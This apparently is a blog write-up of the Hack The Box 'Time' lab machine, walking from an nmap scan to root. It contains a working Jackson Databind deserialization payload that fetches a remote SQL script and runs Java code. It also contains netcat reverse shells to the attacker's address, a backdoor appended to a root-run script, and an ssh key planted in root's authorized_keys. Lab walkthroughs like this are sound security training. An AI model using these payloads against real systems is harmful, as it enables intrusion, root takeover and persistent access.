<!doctype html>
<html>
<head>
	<meta charset="utf-8"/>
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<title>M4t35Z's Blog - basic edition</title>
	<link rel="stylesheet" type="text/css" href="//m4t3sz.gitlab.io/bsc/style.css"/>
</head>

<div id="header">
	<a id="headerLink" href="//m4t3sz.gitlab.io/bsc/">m4t3sz.gitlab.io/bsc</a>
	<span> - </span>
	<span id="headerSubtitle">M4t35Z's Blog - basic edition</span>
</div>
<hr />
<div id="menu">
	<a href="//m4t3sz.gitlab.io/"><b>home</b></a>
	<a href="//twitter.com/szilak44/">twitter</a>
	<a href="//github.com/matesz44/">github</a>
	<a href="//github.com/matesz44/dotfiles/">dotfiles</a>
	<a href="//github.com/matesz44/scripts/">scripts</a>
	<span class="right">
		<a href="//gitlab.com/m4t3sz/sites/">source</a>
	</span>
</div>
<hr />
<div id="content">
<div id="nav">
	<ul>
	<li><a href="/bsc">about</a></li>
	<li><a href="//m4t3sz.gitlab.io/bsc/showcase/">showcase/</a></li>
	<li><a href="//m4t3sz.gitlab.io/bsc/writeup/"><b>>writeup/</b></a>
		<ul>
		<li><a href="//m4t3sz.gitlab.io/bsc/writeup/bug/">bug/</a></li>
		<li><a href="//m4t3sz.gitlab.io/bsc/writeup/ctf/">ctf/</a></li>
		<li><a href="//m4t3sz.gitlab.io/bsc/writeup/htb/"><b>>htb/</b></a>
			<ul>
			<li><a href="//m4t3sz.gitlab.io/bsc/writeup/htb/buff/">buff/</a></li>
			<li><a href="//m4t3sz.gitlab.io/bsc/writeup/htb/feline/">feline/</a></li>
			<li><a href="//m4t3sz.gitlab.io/bsc/writeup/htb/omni/">omni/</a></li>
			<li><a href="//m4t3sz.gitlab.io/bsc/writeup/htb/openkeys/">openkeys/</a></li>
			<li><a href="//m4t3sz.gitlab.io/bsc/writeup/htb/sneaky_mailer/">sneaky mailer/</a></li>
			<li><a href="//m4t3sz.gitlab.io/bsc/writeup/htb/time/"><b>>time/</b></a>
				<ul>
				<li><a href="//m4t3sz.gitlab.io/bsc/writeup/htb/time/img/">img/</a></li>
				</ul>
			</li>
			</ul>
		</li>
		<li><a href="//m4t3sz.gitlab.io/bsc/writeup/thm/">thm/</a></li>
		</ul>
	</li>
	</ul>
</div>
<hr />
<div id="main">

<h1>Initial Information</h1>
<pre><code>Name:       | Time
OS:         | Linux
Difficulty: | Medium
Points:     | 30
Release:    | 24 Oct 2020
IP:         | 10.10.10.214
</code></pre>
<h1>Enumeration</h1>
<p>As always we can start with an <code>nmap</code> scan to identify open ports
and service versions.</p>
<pre><code>$ nmap -sC -sV -p- -T4 -oA recon/tcpfull 10.10.10.214
[sudo] password for matesz:
Starting Nmap 7.91 ( https://nmap.org ) at 2020-10-28 22:20 CET
Nmap scan report for 10.10.10.214
Host is up (0.045s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 0f:7d:97:82:5f:04:2b:e0:0a:56:32:5d:14:56:82:d4 (RSA)
|   256 24:ea:53:49:d8:cb:9b:fc:d6:c4:26:ef:dd:34:c1:1e (ECDSA)
|_  256 fe:25:34:e4:3e:df:9f:ed:62:2a:a4:93:52:cc:cd:27 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Online JSON parser
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.61 seconds
</code></pre>
<h2>http - 80/tcp</h2>
<p>This is a small webapp with two main functionality.
<ul>
<li>Beautify JSON</li>
<li>Validate JSON (<em>in Beta</em>)</li>
</ul>
</p>
<p><img src="img/mainpage.png" alt="mainpage" /></p>
<h3>Beautify</h3>
<p>As always we must try to use the application like a normal user would.
We can insert a simple JSON string like <code>{&quot;asd&quot;:1}</code> and the webapp 
returns a beautified version of it with spaces and newlines added.</p>
<h3>Validate</h3>
<p>Since the validator is in beta, we have a higher chance of finding
interesting behaviour for an unexpected input string.
But for first, we must give it a valid input like we did before (<code>{&quot;asd&quot;:1}</code>).</p>
<p>The validator returned an error to this string which is <strong>unexpected behaviour</strong>!
The error was the following:</p>
<blockquote><p>Validation failed: Unhandled <strong>Java</strong> exception: <strong>com.fasterxml.jackson.databind.exc.MismatchedInputException</strong>: Unexpected token (START_OBJECT), expected START_ARRAY: need JSON Array to contain As.WRAPPER_ARRAY type information for class java.lang.Object</p>
</blockquote>
<ul>
<li>This verbosive error gave us some of the software used by the webpage.</li>
</ul>
<p>For instance, we know it's running Java. The other interesting part of the
error is the <code>com.fasterxml.jackson.databind.exc</code> part.</p>
<p>If we search for this string in <a href="https://duckduckgo.com/?t=ffab&amp;q=com.fasterxml.jackson.databind.exc&amp;ia=web">duckduckgo</a>,
we should find out that the software in use is <strong>Jackson Databind</strong>.</p>
<p><img src="img/jackson-databind.png" alt="jackson-databind" /></p>
<h4>Searching for CVE's</h4>
<p>Searching for <a href="https://duckduckgo.com/?q=jackson+databind+exploit+site%3Agithub.com&amp;t=ffab&amp;ia=web"><code>jackson databind exploit site:github.com</code></a>
reveals that there are some CVE PoC's for it.</p>
<p>After some scrolling we should find <a href="https://github.com/jas502n/CVE-2019-12384">github.com/jas502n/CVE-2019-12384</a>.</p>
<p><img src="img/jackson-databind-poc.png" alt="jackson-databind-poc" /></p>
<p>The githhub repo links to a blog post (<a href="https://blog.doyensec.com/2019/07/22/jackson-gadgets.html">blog.doyensec.com/2019/07/22/jackson-gadgets.html</a>)
which explains the vulnerability in detail.</p>
<h1>Exploitation</h1>
<p>The blog provides a test payload which makes a get request to <code>/inject.sql</code>
on the provided ip.</p>
<pre><code>[&quot;ch.qos.logback.core.db.DriverManagerConnectionSource&quot;, {&quot;url&quot;:&quot;jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://localhost:8000/inject.sql'&quot;}]
</code></pre>
<h2>Testing</h2>
<p>For first, we need to create a "listener" for the request. In this case I used <code>python3 -m http.server 8000</code> to host a webserver on port 8000.</p>
<p>Then we can replace localhost with our ip address and paste it into the validator!</p>
<pre><code>[&quot;ch.qos.logback.core.db.DriverManagerConnectionSource&quot;, {&quot;url&quot;:&quot;jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://10.10.14.74:8000/inject.sql'&quot;}]
</code></pre>
<p><img src="img/validate-test-get-payload.png" alt="validate-test-get-payload" /></p>
<p>After hitting <em>Process</em> the website starts hanging for a bit and we will eventually get an error:</p>
<blockquote><p>Validation failed: 2021-04-04 12:29:10 command: slow query: 130 ms</p>
</blockquote>
<p>And if we take a look at our listener we should see the target made a get request to <code>/inject.sql</code>.</p>
<pre><code>$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.214 - - [04/Apr/2021 17:19:07] code 404, message File not found
10.10.10.214 - - [04/Apr/2021 17:19:07] &quot;GET /inject.sql HTTP/1.1&quot; 404 -
</code></pre>
<h2>Creating inject.sql and gaining foothold</h2>
<p>The blog post also mentions the contents of the <code>inject.sql</code> file.</p>
<pre><code>CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
	String[] command = {&quot;bash&quot;, &quot;-c&quot;, cmd};
	java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter(&quot;\\A&quot;);
	return s.hasNext() ? s.next() : &quot;&quot;;  }
$$;
CALL SHELLEXEC('id &gt; exploited.txt')
</code></pre>
<ul>
<li>This creates a file named <code>exploited.txt</code> with the contents of the output of the <code>id</code> command.</li>
</ul>
<p>We can change this command to a reverse shell to gain shell access to the target.</p>
<p>I used the openbsd netcat reverse shell:</p>
<pre><code>rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 10.10.14.74 1337 &gt;/tmp/f
</code></pre>
<p><code>inject.sql</code>:</p>
<pre><code>CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
	String[] command = {&quot;bash&quot;, &quot;-c&quot;, cmd};
	java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter(&quot;\\A&quot;);
	return s.hasNext() ? s.next() : &quot;&quot;;  }
$$;
CALL SHELLEXEC('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 10.10.14.74 1337 &gt;/tmp/f')
</code></pre>
<p>We can host this file with <code>python3 -m http.server 8000</code> and run our initial
payload on the webapp again in order to gain remote code execution by including
the <strong>malicious <code>.sql</code> file</strong>.</p>
<p>Hosting:</p>
<pre><code>$ python3 -m http.server 8000
</code></pre>
<p>Reverse shell listener:</p>
<pre><code>$ nc -lvnp 1337
</code></pre>
<p>Validate payload:</p>
<pre><code>[&quot;ch.qos.logback.core.db.DriverManagerConnectionSource&quot;, {&quot;url&quot;:&quot;jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://10.10.14.74:8000/inject.sql'&quot;}]
</code></pre>
<p>After 1-2 seconds we should see a get request and a reverse shell as <code>pericles</code>.</p>
<pre><code>$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.214 - - [04/Apr/2021 17:32:39] &quot;GET /inject.sql HTTP/1.1&quot; 200 -
</code></pre>
<pre><code>$ nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.14.74] from (UNKNOWN) [10.10.10.214] 35242
/bin/sh: 0: can't access tty; job control turned off
$ hostname;id;ip a
time
uid=1000(pericles) gid=1000(pericles) groups=1000(pericles)
1: lo: &lt;LOOPBACK,UP,LOWER_UP&gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: ens160: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc mq state UP group default
qlen 1000
    link/ether 00:50:56:b9:3c:ce brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.214/24 brd 10.10.10.255 scope global ens160
       valid_lft forever preferred_lft forever
    inet6 dead:beef::250:56ff:feb9:3cce/64 scope global dynamic mngtmpaddr
       valid_lft 86042sec preferred_lft 14042sec
    inet6 fe80::250:56ff:feb9:3cce/64 scope link
       valid_lft forever preferred_lft forever
</code></pre>
<h1>Privilege Escalation from pericles</h1>
<h2>Enumeration</h2>
<p>We can run an automated privesc checker script like <a href="https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh"><code>linpeas.sh</code></a>
in order to discover interesting files and possible privilege escalation vectors.</p>
<p>I noted the following lines from the linpeas output.</p>
<pre><code>[+] .sh files in path
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#script-binaries-in-path
/usr/bin/gettext.sh
/usr/bin/timer_backup.sh
/usr/bin/rescan-scsi-bus.sh

[+] Interesting GROUP writable files (not in Home) (max 500)
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files
  Group pericles:
/usr/bin/timer_backup.sh
/dev/shm/linpeas.sh
</code></pre>
<ul>
<li>Linpeas found an unusual file on the system: <code>/usr/bin/timer_backup.sh</code></li>
</ul>
<p>For first we can use <code>cat</code> to get the contents of the file.</p>
<pre><code>$ cat /usr/bin/timer_backup.sh
#!/bin/bash
zip -r website.bak.zip /var/www/html &amp;&amp; mv website.bak.zip /root/backup.zip
</code></pre>
<ul>
<li>This script is zipping up the contents of the <code>/var/www/html</code> directory into <code>/root/backup.zip</code></li>
<li>I immediately spotted that it tries to write into the <code>/root</code> folder which means only root would have the correct permissions to do this</li>
</ul>
<p>We can check the owner of the file with <code>ls -l</code>, and this turns out to be the
current user <code>pericles</code>.</p>
<pre><code>$ ls -la /usr/bin/timer_backup.sh
-rwxrw-rw- 1 pericles pericles 88 Dec  6 18:05 /usr/bin/timer_backup.sh
</code></pre>
<p>This means we can write into this file and we might use it to escalate our
privileges to an other user if it gets executed by someone else on the system.</p>
<p>We can check for the occurrence of this filename recursively on the system with
<code>grep</code>.</p>
<pre><code>$ grep -r 'timer_backup.sh' / 2&gt;/dev/null
/etc/systemd/system/web_backup.service:ExecStart=/bin/bash /usr/bin/timer_backup.sh
</code></pre>
<p>The script is invoked in a systemd service file <code>/etc/systemd/system/web_backup.service</code>.</p>
<p>The owner of these service files are usually root, but we may check it anyways.</p>
<pre><code>$ ls -la /etc/systemd/system/web_backup.service
-rw-r--r-- 1 root root 106 Oct 23 04:57 /etc/systemd/system/web_backup.service
</code></pre>
<h3>pspy</h3>
<p>We can use <a href="https://github.com/DominicBreuker/pspy">pspy</a> to check for running
programs on a linux target.</p>
<pre><code>$ wget 10.10.14.111:8000/pspy64
$ chmod +x ./pspy64
$ ./pspy64
---[SNIP]---
2021/04/15 15:09:41 CMD: UID=0    PID=103761 | /bin/bash /usr/bin/timer_backup.sh
---[SNIP]---
</code></pre>
<ul>
<li>This confirms our theory that the script gets executed regularly by <code>root</code> (UID 0).</li>
</ul>
<h2>Exploitation of the weak permissions</h2>
<h3>Reverse shell</h3>
<p>We can paste a revshell payload into this script and start a listener.</p>
<p>adding a revshell payload to the script:</p>
<pre><code>$ echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 10.10.14.111 9002 &gt;/tmp/f' &gt;&gt; /usr/bin/timer_backup.sh
</code></pre>
<p>listener:</p>
<pre><code>$ nc -lvnp 9002
</code></pre>
<p>It is important to note that this shell closes very fast after execution which
means we we have a limited time to execute arbitrary commands.</p>
<p>I copy pasted my commands that I wanted to run when the shell pops.</p>
<p>These were the following ones.</p>
<pre><code>id; hostname; ip a; ls -la /root; cat /root/root.txt
</code></pre>
<p>Now, we should wait until the next execution. And quickly paste in our oneliner.</p>
<pre><code># id; hostname; ip a; ls -la /root; cat /root/root.txt
uid=0(root) gid=0(root) groups=0(root)
time
1: lo: &lt;LOOPBACK,UP,LOWER_UP&gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: ens160: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:b9:60:94 brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.214/24 brd 10.10.10.255 scope global ens160
       valid_lft forever preferred_lft forever
    inet6 dead:beef::250:56ff:feb9:6094/64 scope global dynamic mngtmpaddr
       valid_lft 86274sec preferred_lft 14274sec
    inet6 fe80::250:56ff:feb9:6094/64 scope link
       valid_lft forever preferred_lft forever
total 5816
drwx------  7 root root    4096 Apr 15 15:37 .
drwxr-xr-x 20 root root    4096 Apr 15 15:37 ..
-rw-r--r--  1 root root 5900858 Apr 15 15:37 backup.zip
lrwxrwxrwx  1 root root       9 Oct  2  2020 .bash_history -&gt; /dev/null
-rw-r--r--  1 root root    3106 Dec  5  2019 .bashrc
drwx------  2 root root    4096 Feb 10 15:18 .cache
drwx------  3 root root    4096 Feb 10 15:18 .config
drwxr-xr-x  3 root root    4096 Feb 10 15:18 .local
-rw-r--r--  1 root root     161 Dec  5  2019 .profile
-r--------  1 root root      33 Apr 15 05:14 root.txt
-rw-r--r--  1 root root      66 Oct 22 08:45 .selected_editor
drwxr-xr-x  3 root root    4096 Feb 10 15:18 snap
drwx------  2 root root    4096 Feb 10 15:18 .ssh
-rwxr--r--  1 root root      88 Oct 22 08:49 timer_backup.sh
-rw-------  1 root root     929 Feb  9 14:42 .viminfo
f496-------[REDACTED]-------8d43
</code></pre>
<h3>Stable ssh shell</h3>
<p>But we shouldn't stop here because we need to get a <strong>stable</strong> shell.</p>
<p>Since root has a <code>.ssh</code> directory it means we can paste our public ssh key into
<code>/root/.ssh/authorized_keys</code>
in order to access the target from our attacker machine without any password through ssh.</p>
<p>I used the following command to add my key.
<ul>
<li>Note that you might need to generate your ssh keypair with <code>ssh-keygen</code></li>
</ul>
</p>
<pre><code>$ echo 'echo &quot;ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMjNDhZW/vSZFEtwXWlTudO/wMFnw4nP8atTWR6j3OOp matesz@MLKali&quot; &gt;&gt; /root/.ssh/authorized_keys' &gt;&gt; /usr/bin/timer_backup.sh
</code></pre>
<p>And then I just used ssh to connect to the box as root from my attacker host.</p>
<pre><code>$ ssh root@10.10.10.214
Last login: Tue Feb  9 14:41:33 2021
root@time:~# id; hostname; ip a
uid=0(root) gid=0(root) groups=0(root)
time
1: lo: &lt;LOOPBACK,UP,LOWER_UP&gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: ens160: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:b9:60:94 brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.214/24 brd 10.10.10.255 scope global ens160
       valid_lft forever preferred_lft forever
    inet6 dead:beef::250:56ff:feb9:6094/64 scope global dynamic mngtmpaddr
       valid_lft 86020sec preferred_lft 14020sec
    inet6 fe80::250:56ff:feb9:6094/64 scope link
       valid_lft forever preferred_lft forever
</code></pre>
</div>

</div>

<hr /><hr />
<footer>
	<p>Author: M4t35Z</p>
	<p><a href="https://www.buymeacoffee.com/m4t35z">Support the creator (buymeacoffee)</a></p>
	<p><i>Created with <a href="https://github.com/karlb/smu/">smu</a> + <a href="https://git.suckless.org/sites/">suckless style</a></i></p>
</footer>
</html>
